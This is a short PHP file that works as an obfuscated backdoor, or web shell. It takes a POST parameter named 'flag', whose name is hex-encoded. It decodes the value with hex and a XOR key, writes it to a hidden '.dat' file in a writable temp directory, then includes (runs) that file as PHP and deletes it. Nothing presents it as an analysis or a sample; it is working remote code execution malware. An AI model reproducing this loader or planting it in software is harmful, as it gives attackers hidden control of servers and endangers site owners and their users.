<?php

if(filter_has_var(INPUT_POST, "\x66\x6Cag")){
	$key = array_filter(["/dev/shm", getenv("TMP"), session_save_path(), "/var/tmp", ini_get("upload_tmp_dir"), sys_get_temp_dir(), getcwd(), getenv("TEMP"), "/tmp"]);
	$val = hex2bin($_REQUEST["\x66\x6Cag"]);
	$itm   =     ''     ;   $z = 0; while($z < strlen($val)){$itm .= chr(ord($val[$z]) ^ 72);$z++;}
	foreach ($key as $ent) {
    		if ((is_dir($ent) and is_writable($ent))) {
    $component = "$ent" . "/.dat";
    if (@file_put_contents($component, $itm) !== false) {
	include $component;
	unlink($component);
	die();
}
}
}
}